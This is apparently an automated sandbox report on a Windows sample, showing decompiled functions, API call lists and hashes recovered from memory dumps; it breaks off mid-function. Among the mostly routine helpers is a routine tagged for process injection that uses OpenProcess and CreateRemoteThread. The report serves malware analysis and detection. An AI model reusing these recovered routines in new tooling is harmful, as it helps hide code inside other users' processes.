Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: Thread$CurrentObjectPathPriorityQuoteSingleSpacesWait
String ID:
API String ID: 2045921288-0
Opcode ID: 93bf2ba2f5dedabc5307c0d002b7dd510de7977bf18bf1a224c0fff037684c8b
Instruction ID: 5e719791a775b69305ddd3397e25d0dbd76fbc9f9030c4b2e13e69ae5a149ece
Opcode Fuzzy Hash: 93bf2ba2f5dedabc5307c0d002b7dd510de7977bf18bf1a224c0fff037684c8b
Instruction Fuzzy Hash: C321023192020A9BDB21EBB4FCD8BEE777DEF60784F10415AD706AB154DE709E588B90

Uniqueness

Uniqueness Score: -1.00%

Function 012B6EF9 Relevance: 7.6, APIs: 5, Instructions: 63networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(?,00000002,00000000), ref: 012B6F09
WSAIoctl.WS2_32(00000000,48000016,00000000,00000000,?,00000000,?,00000000,00000000), ref: 012B6F33
WSAGetLastError.WS2_32(?,?,?,00000002,00000000), ref: 012B6F3A
WSAIoctl.WS2_32(?,48000016,00000000,00000000,00000000,?,?,00000000,00000000), ref: 012B6F66
closesocket.WS2_32(?), ref: 012B6F7A

Memory Dump Source

Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: Ioctl$ErrorLastclosesocketsocket
String ID:
API String ID: 2507967184-0
Opcode ID: e150cc40d058bf1d2105923eddd5bcdde8a44837b1def4a567649af403c51fd1
Instruction ID: c41f65a7382bff1667cbf0cfa1ad70d70a7f500c401dc1b1a92ccc586bef0a92
Opcode Fuzzy Hash: e150cc40d058bf1d2105923eddd5bcdde8a44837b1def4a567649af403c51fd1
Instruction Fuzzy Hash: 36111FB1C12119BBDB209BA9EC8CCEFBF7CEF453A4B504255F616E2194D6305A41DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 012B716D Relevance: 7.6, APIs: 5, Instructions: 56
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E012B716D(long __ecx, HANDLE* __edx, signed int _a4, long _a8) {
				long _v8;
				long _v12;
				HANDLE* _v16;
				struct tagMSG _v44;
				long _t19;
				long _t29;

				_v16 = __edx;
				_v8 = __ecx;
				_t19 = MsgWaitForMultipleObjects(__ecx, __edx, _a4 & 0x000000ff, _a8, 0x4ff);
				_v12 = _t19;
				if(_t19 == _v8) {
					L4:
					while(PeekMessageW( &_v44, 0, 0, 0, 1) != 0) {
						if(_v44.message != 0x12) {
							TranslateMessage( &_v44);
							DispatchMessageW( &_v44);
							continue;
						}
						L6:
						goto L7;
					}
					_t29 = MsgWaitForMultipleObjects(_v8, _v16, _a4 & 0x000000ff, _a8, 0x4ff);
					_v12 = _t29;
					if(_t29 == _v8) {
						goto L4;
					}
					goto L6;
				}
				L7:
				return _v12;
			}

0x012b7188
0x012b718e
0x012b7191
0x012b7193
0x012b7199
0x00000000
0x012b71be
0x012b71a8
0x012b71ae
0x012b71b8
0x00000000
0x012b71b8
0x012b71e8
0x00000000
0x012b71e8
0x012b71de
0x012b71e0
0x012b71e6
0x00000000
0x00000000
0x00000000
0x012b71e6
0x012b71e9
0x012b71ef

APIs

MsgWaitForMultipleObjects.USER32 ref: 012B7191
TranslateMessage.USER32(?), ref: 012B71AE
DispatchMessageW.USER32 ref: 012B71B8
PeekMessageW.USER32 ref: 012B71C9
MsgWaitForMultipleObjects.USER32 ref: 012B71DE

Memory Dump Source

Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: Message$MultipleObjectsWait$DispatchPeekTranslate
String ID:
API String ID: 4084795276-0
Opcode ID: 07e256f1b64cb2337e16a23d66aae82928703bd80c8fb600376ee5faa3c8cbe5
Instruction ID: 61323998cb0cd3447b96bac43ffe2a5e65b1e508a43b9be3486d4e8f3add19c2
Opcode Fuzzy Hash: 07e256f1b64cb2337e16a23d66aae82928703bd80c8fb600376ee5faa3c8cbe5
Instruction Fuzzy Hash: 3B1115B6C20119BFDF10DBA9DD88CEEBFBCEB88311F148466EA05E3144D2709A449B74

Uniqueness

Uniqueness Score: -1.00%

Function 012CE3A7 Relevance: 7.6, APIs: 5, Instructions: 56
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E012CE3A7(struct HWND__* _a4, struct tagRECT* _a8, int _a12) {
				int _t20;
				signed int _t21;
				struct HWND__* _t28;
				char* _t32;

				_t28 = _a4;
				if(( *0x12dc738 & 0x00000004) == 0 || L012B150A() == 0) {
					L9:
					return GetUpdateRect(_t28, _a8, _a12);
				} else {
					_t32 = TlsGetValue( *0x12dd83c);
					if(_t32 == 0 || _t28 !=  *((intOrPtr*)(_t32 + 4))) {
						goto L9;
					} else {
						if(_a8 != 0) {
							_t6 = _t32 + 0xc; // 0xc
							L012B1947( &_a8, _t6, 0x10);
						}
						if(_a12 != 0) {
							_t20 = SaveDC( *(_t32 + 8));
							_t21 = SendMessageW(_t28, 0x14,  *(_t32 + 8), 0);
							asm("sbb eax, eax");
							 *((intOrPtr*)(_t32 + 0x1c)) =  ~_t21 + 1;
							RestoreDC( *(_t32 + 8), _t20);
						}
						 *_t32 = 1;
						return 1;
					}
				}
			}

0x012ce3b2
0x012ce3b6
0x012ce427
0x00000000
0x012ce3c1
0x012ce3cd
0x012ce3d1
0x00000000
0x012ce3d8
0x012ce3dc
0x012ce3e0
0x012ce3e8
0x012ce3e8
0x012ce3f1
0x012ce3f7
0x012ce407
0x012ce40f
0x012ce416
0x012ce419
0x012ce41f
0x012ce423
0x00000000
0x012ce423
0x012ce3d1

APIs

TlsGetValue.KERNEL32 ref: 012CE3C7
SaveDC.GDI32(?), ref: 012CE3F7
SendMessageW.USER32(?,00000014,?,00000000), ref: 012CE407
RestoreDC.GDI32(?,00000000), ref: 012CE419
GetUpdateRect.USER32 ref: 012CE42E

Memory Dump Source

Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: MessageRectRestoreSaveSendUpdateValue
String ID:
API String ID: 1426479601-0
Opcode ID: bc24f5709fc339ae88df2a753c791544ceb85ec01c7930e9d05e32420af3f707
Instruction ID: ca7b3ed9569bcb0a479b173a1487714124c3ceba402f71ce18a60eccf2cc593d
Opcode Fuzzy Hash: bc24f5709fc339ae88df2a753c791544ceb85ec01c7930e9d05e32420af3f707
Instruction Fuzzy Hash: CF118232411746EFDB329FA4EC8CFAABFA8EB08711F058919FB96C6054C730A050CB60

Uniqueness

Uniqueness Score: -1.00%

Function 012C2ECF Relevance: 7.6, APIs: 5, Instructions: 54synchronizationthreadinjectionCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(0000047A,00000000,?), ref: 012C2EEC
CreateRemoteThread.KERNEL32(00000000,00000000,00000000,-0258DF2B,00000000,00000000,00000000), ref: 012C2F1E
WaitForSingleObject.KERNEL32(00000000,00002710), ref: 012C2F31
CloseHandle.KERNEL32(?), ref: 012C2F3A
VirtualFreeEx.KERNEL32(00000000,00000000,00000000,00008000), ref: 012C2F4E
CloseHandle.KERNEL32(00000000,?), ref: 012C2F55

Memory Dump Source

Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: CloseHandle$CreateFreeObjectOpenProcessRemoteSingleThreadVirtualWait
String ID:
API String ID: 14861764-0
Opcode ID: 164102a83bf6b0f342a11bd01864867f4ba72af6b9f989bf8935906cbcafefa9
Instruction ID: b3fc47a7f4fbacc1d33505c55b40ae2ca5251fbbdff0f7f79b76f464b0b8a333
Opcode Fuzzy Hash: 164102a83bf6b0f342a11bd01864867f4ba72af6b9f989bf8935906cbcafefa9
Instruction Fuzzy Hash: 3A01D8B251424DBFEB211FA8ECCCDEE3FADEB45294B014428FB0686100CB759D168761

Uniqueness

Uniqueness Score: -1.00%

Function 012CE59F Relevance: 7.5, APIs: 5, Instructions: 47
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E012CE59F() {
				struct tagMSG _v32;
				signed int _t12;

				SetThreadPriority(GetCurrentThread(), 1);
				SetEvent( *0x12dd844);
				while(1) {
					_t12 = GetMessageW( &_v32, 0xffffffff, 0, 0);
					if(_t12 == 0xffffffff) {
						break;
					}
					if(_t12 == 0) {
						break;
					}
					if(_v32.message ==  *0x12dd840 && _v32.wParam == 0xfffffffc) {
						_push(1);
						_push( *0x12dd848 + 0x114);
						 *((char*)( *0x12dd848 + 0x124)) = L012B1663(0x12dd838, _v32.lParam);
						SetEvent( *0x12dd844);
					}
				}
				return _t12 & 0xffffff00 | _t12 == 0x00000000;
			}

0x012ce5b0
0x012ce5c2
0x012ce60f
0x012ce619
0x012ce61e
0x00000000
0x00000000
0x012ce5ce
0x00000000
0x00000000
0x012ce5d9
0x012ce5e9
0x012ce5f0
0x012ce601
0x012ce60d
0x012ce60d
0x012ce5d9
0x012ce62a

APIs

GetCurrentThread.KERNEL32 ref: 012CE5A9
SetThreadPriority.KERNEL32(00000000), ref: 012CE5B0
SetEvent.KERNEL32 ref: 012CE5C2
SetEvent.KERNEL32(?,00000001), ref: 012CE60D
GetMessageW.USER32(?,000000FF,00000000,00000000), ref: 012CE619

Memory Dump Source

Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: EventThread$CurrentMessagePriority
String ID:
API String ID: 3943651903-0
Opcode ID: aa47d53c15846322fa30cbdb2c577f628da7be26096e0d71d29041cbac0802f9
Instruction ID: 8607d6ecb395865f445b89ad1bee2a39d88ccc3610f5c10c27d02c0caf5a7d00
Opcode Fuzzy Hash: aa47d53c15846322fa30cbdb2c577f628da7be26096e0d71d29041cbac0802f9
Instruction Fuzzy Hash: DB01B131D116199FCB21AAACFC4EF9A3BB9AB84B20F250314E714D71C5DA60A402CB90

Uniqueness

Uniqueness Score: -1.00%

Function 012CD002 Relevance: 7.5, APIs: 5, Instructions: 32synchronizationwindowCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,762EA660,012CD43B,00000000), ref: 012CD008
ReleaseMutex.KERNEL32(?), ref: 012CD03C
IsWindow.USER32(?), ref: 012CD043
PostMessageW.USER32(?,00000215,00000000,?), ref: 012CD05D
SendMessageW.USER32(?,00000215,00000000,?), ref: 012CD065

Memory Dump Source

Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: Message$MutexObjectPostReleaseSendSingleWaitWindow
String ID:
API String ID: 794275546-0
Opcode ID: dd0e75df34e8abde754914f7cdb33fda2391d6937f3313ca433f6caa8dfb1cec
Instruction ID: 6455ea567c38c5a959ca0613c50820b933f4f8c81a6c2dca9da278a59d60e5dc
Opcode Fuzzy Hash: dd0e75df34e8abde754914f7cdb33fda2391d6937f3313ca433f6caa8dfb1cec
Instruction Fuzzy Hash: 34F03C78504700DFD3209F28E94CD6ABBF5FB99711B058A6CFA9687355C770A841CB61

Uniqueness

Uniqueness Score: -1.00%

Function 012B2E60 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 167
threadsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E012B2E60(void* __esi) {
				intOrPtr _v8;
				signed int _v12;
				char _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				signed int _v52;
				char _v116;
				signed int _v120;
				void* _t68;
				signed char _t73;
				long _t77;
				signed char _t82;
				void* _t94;
				signed int _t107;
				signed int _t108;
				void* _t114;
				signed int _t164;
				void* _t166;
				void* _t167;

				_t166 = __esi;
				L012B1654(_t68);
				_v8 = L012B1780(0x743c1521, 2);
				if(_v8 != 0) {
					SetThreadPriority(GetCurrentThread(), 0xfffffff1);
					_t73 = L012B150A();
					__eflags = _t73 & 0x000000ff;
					if((_t73 & 0x000000ff) == 0) {
						L22:
						L012B1492(_v8);
						__eflags = 0;
						return 0;
					} else {
						goto L3;
					}
					while(1) {
						L3:
						_t114 =  *0x12dcc54; // 0x0
						_t77 = WaitForSingleObject(_t114, 0x1388);
						__eflags = _t77 - 0x102;
						if(_t77 != 0x102) {
							goto L22;
						}
						_v12 = L012B1843();
						__eflags = _v12;
						if(__eflags == 0) {
							L21:
							continue;
						}
						_v20 = L012B1AAA(_v12, __eflags, 0x20000000,  &_v16);
						__eflags = _v20;
						if(__eflags == 0) {
							L20:
							L012B1933(_v20);
							L012B1933(_v12);
							goto L21;
						}
						_t82 = E012B2BF0(_v20, _v16, __eflags);
						__eflags = _t82 & 0x000000ff;
						if((_t82 & 0x000000ff) == 0) {
							goto L20;
						}
						_v24 = _v20;
						do {
							_v28 = _v24;
							_v32 = L012B1717(_v24, 1);
							_v40 = L012B1717(_v24, 2);
							_v36 = 0;
							_v52 = L012B1523(L012B1BE0(_v28), _v28, _t86, _t166);
							_v48 = L012B1523(L012B1BE0(_v32), _v32, _t88, _t166);
							_v44 = L012B1523(L012B1BE0(_v40), _v40, _t90, _t166);
							_push(_v44);
							_push(_v48);
							_t156 = _v52;
							_t94 = L012B1A8C( &_v116, 0x20, L"Global\\%08X%08X%08X", _v52);
							_t167 = _t167 + 0x18;
							__eflags = _t94 - 0x1f;
							if(_t94 == 0x1f) {
								_t156 =  &_v116;
								_v36 = L012B177B(0x12dc7c8,  &_v116);
							}
							__eflags = _v36;
							if(_v36 != 0) {
								_v120 = L012B1C17(0x10);
								__eflags = _v120;
								if(_v120 == 0) {
									L18:
									L012B1492(_v36);
									goto L19;
								}
								 *_v120 = L012B12A8(_v28, _t156 | 0xffffffff);
								 *((intOrPtr*)(_v120 + 4)) = L012B12A8(_v32, _t156 | 0xffffffffffffffff);
								 *((intOrPtr*)(_v120 + 8)) = L012B12A8(_v40, _v120 | 0xffffffff);
								 *(_v120 + 0xc) = _v36;
								__eflags =  *_v120;
								if( *_v120 == 0) {
									L17:
									L012B1933( *_v120);
									L012B1933( *((intOrPtr*)(_v120 + 4)));
									L012B1933( *((intOrPtr*)(_v120 + 8)));
									L012B1933(_v120);
									goto L18;
								}
								_t164 = _v120;
								__eflags =  *(_t164 + 4);
								if( *(_t164 + 4) == 0) {
									goto L17;
								}
								_t107 = _v120;
								__eflags =  *(_t107 + 8);
								if( *(_t107 + 8) == 0) {
									goto L17;
								}
								_t108 = L012B1136(0x80000, E012B30C0, _v120);
								__eflags = _t108;
								if(_t108 <= 0) {
									goto L17;
								}
							}
							L19:
							_v24 = L012B1717(_v24, 3);
							__eflags = _v24;
						} while (_v24 != 0);
						goto L20;
					}
					goto L22;
				}
				return 1;
			}

0x012b2e60
0x012b2e68
0x012b2e79
0x012b2e80
0x012b2e95
0x012b2e9b
0x012b2ea3
0x012b2ea5
0x012b30a7
0x012b30aa
0x012b30af
0x00000000
0x00000000
0x00000000
0x00000000
0x012b2eab
0x012b2eab
0x012b2eb0
0x012b2eb7
0x012b2ebd
0x012b2ec2
0x00000000
0x00000000
0x012b2ecd
0x012b2ed0
0x012b2ed4
0x012b30a2
0x00000000
0x012b30a2
0x012b2ef0
0x012b2ef3
0x012b2ef7
0x012b3092
0x012b3095
0x012b309d
0x00000000
0x012b309d
0x012b2f03
0x012b2f0b
0x012b2f0d
0x00000000
0x00000000
0x012b2f16
0x012b2f19
0x012b2f1c
0x012b2f2c
0x012b2f3c
0x012b2f3f
0x012b2f58
0x012b2f6d
0x012b2f82
0x012b2f88
0x012b2f8c
0x012b2f8d
0x012b2f9c
0x012b2fa1
0x012b2fa4
0x012b2fa7
0x012b2fa9
0x012b2fb6
0x012b2fb6
0x012b2fb9
0x012b2fbd
0x012b2fcd
0x012b2fd0
0x012b2fd4
0x012b3070
0x012b3073
0x00000000
0x012b3073
0x012b2fe8
0x012b2ff8
0x012b3009
0x012b3012
0x012b3018
0x012b301b
0x012b3048
0x012b304d
0x012b3058
0x012b3063
0x012b306b
0x00000000
0x012b306b
0x012b301d
0x012b3020
0x012b3024
0x00000000
0x00000000
0x012b3026
0x012b3029
0x012b302d
0x00000000
0x00000000
0x012b303d
0x012b3042
0x012b3044
0x00000000
0x00000000
0x012b3046
0x012b3078
0x012b3085
0x012b3088
0x012b3088
0x00000000
0x012b2f19
0x00000000
0x012b2eab
0x00000000

APIs

GetCurrentThread.KERNEL32 ref: 012B2E8E
SetThreadPriority.KERNEL32(00000000), ref: 012B2E95
WaitForSingleObject.KERNEL32(00000000,00001388), ref: 012B2EB7

Strings

Global\%08X%08X%08X, xrefs: 012B2F91

Memory Dump Source

Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: Thread$CurrentObjectPrioritySingleWait
String ID: Global\%08X%08X%08X
API String ID: 991781811-3239447729
Opcode ID: c4f261bfbc78644a93e56e0517d0c8a3803ef92e7c269530a8b09f2e638c262e
Instruction ID: 5047abc5440277be3fb4db4e453a2dd025c5c4476bc2dea31c215c11c4921e78
Opcode Fuzzy Hash: c4f261bfbc78644a93e56e0517d0c8a3803ef92e7c269530a8b09f2e638c262e
Instruction Fuzzy Hash: 80612E70E2010ADBDB14EBA4E9E4BFDB7B2BF94340F208628D1116B2D5DB756E51CB50

Uniqueness

Uniqueness Score: -1.00%

Function 012BBA50 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E012BBA50(WCHAR* __ecx, WCHAR* __edx, WCHAR* _a4, struct _STARTUPINFOW* _a8, intOrPtr _a12) {
				char _v8;
				struct _PROCESS_INFORMATION _v24;
				char _v92;
				struct _STARTUPINFOW* _t16;
				WCHAR* _t26;
				WCHAR* _t28;
				WCHAR* _t29;

				_t29 = __edx;
				_v8 = 0;
				_t16 = _a8;
				_t26 = __ecx;
				if(_t16 == 0) {
					L012B15F5( &_v92,  &_v92, 0, 0x44);
					_v92 = 0x44;
					_t16 =  &_v92;
				}
				_t28 =  &_v8;
				if(_t29 != 0) {
					_t28 = _t29;
				}
				if(CreateProcessW(_t26, _t28, 0, 0, 0, 0x4000000, 0, _a4, _t16,  &_v24) == 0) {
					return 0;
				} else {
					if(_a12 == 0) {
						CloseHandle(_v24.hThread);
						CloseHandle(_v24);
					} else {
						L012B1947(_a12,  &_v24, 0x10);
					}
					return _v24.dwProcessId;
				}
			}

0x012bba50
0x012bba5a
0x012bba5e
0x012bba63
0x012bba67
0x012bba70
0x012bba75
0x012bba7c
0x012bba7c
0x012bba7f
0x012bba84
0x012bba86
0x012bba86
0x012bbaa3
0x00000000
0x012bbaa5
0x012bbaa8
0x012bbac3
0x012bbac8
0x012bbaaa
0x012bbab3
0x012bbab3
0x00000000
0x012bbaca

APIs

CreateProcessW.KERNEL32 ref: 012BBA9B
CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,04000000,00000000,?,?,?), ref: 012BBAC3
CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,04000000,00000000,?,?,?), ref: 012BBAC8

Strings

D, xrefs: 012BBA75

Memory Dump Source

Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: CloseHandle$CreateProcess
String ID: D
API String ID: 2922976086-2746444292
Opcode ID: 85b28ad519f26b7f870570eee1bf2939006908ffb462c2b9efe64a9e50d80898
Instruction ID: 41aa89810149a8643c994a62e73ba1bfc0c55788a6bb2aec86a325810cbd976d
Opcode Fuzzy Hash: 85b28ad519f26b7f870570eee1bf2939006908ffb462c2b9efe64a9e50d80898
Instruction Fuzzy Hash: 77118B71A20169ABDB21DFA4DC85EEFBB7DEF05791F004411B605A6044DA70AE00CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 012BE1EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E012BE1EC(char __ecx, WCHAR* __edx) {
				char _v524;
				short _v1044;
				void* _t11;
				WCHAR* _t16;
				void* _t21;
				char _t22;
				void* _t23;

				_t16 = __edx;
				_t22 = __ecx;
				if(GetTempPathW(0xf6,  &_v1044) - 1 > 0xf5) {
					L8:
					return 0;
				}
				if(_t22 == 0) {
					_t22 = L"tmp";
				}
				_t21 = 0;
				while(1) {
					_push(L012B122B());
					_t11 = L012B1A8C( &_v524, 0x104, L"%s%08x", _t22);
					_t23 = _t23 + 0x14;
					if(_t11 == 0xffffffff) {
						goto L8;
					}
					if(L012B1203(_t16,  &_v1044,  &_v524) == 0 || CreateDirectoryW(_t16, 0) == 0) {
						_t21 = _t21 + 1;
						if(_t21 < 0x64) {
							continue;
						}
						goto L8;
					} else {
						return 1;
					}
				}
				goto L8;
			}

0x012be204
0x012be206
0x012be214
0x012be271
0x00000000
0x012be271
0x012be218
0x012be21a
0x012be21a
0x012be21f
0x012be221
0x012be226
0x012be239
0x012be23e
0x012be244
0x00000000
0x00000000
0x012be25c
0x012be26b
0x012be26f
0x00000000
0x00000000
0x00000000
0x012be278
0x00000000
0x012be278
0x012be25c
0x00000000

APIs

GetTempPathW.KERNEL32(000000F6,?), ref: 012BE208
CreateDirectoryW.KERNEL32(?,00000000,?), ref: 012BE261

Strings

%s%08x, xrefs: 012BE228
tmp, xrefs: 012BE21A

Memory Dump Source

Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: CreateDirectoryPathTemp
String ID: %s%08x$tmp
API String ID: 2885754953-1196434543
Opcode ID: 6b86619a15f1fd9007a0bc5ca767eb0788ad67815d4e43182daccf2a51f06f8f
Instruction ID: b5ac314ed64348e7a4b0a3ad21abe5b6c50a285f8889cb8e215f5f886fed9699
Opcode Fuzzy Hash: 6b86619a15f1fd9007a0bc5ca767eb0788ad67815d4e43182daccf2a51f06f8f
Instruction Fuzzy Hash: 63017BB5A103251ADB31A568ECCAFFB376CDF403A4F010A70EB16E3181D560CC8546A0

Uniqueness

Uniqueness Score: -1.00%

Function 012C868E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E012C868E(long __eax, char _a4) {
				long _t2;
				WCHAR* _t9;
				void* _t16;
				void* _t29;

				_t2 = __eax;
				_t9 = __eax;
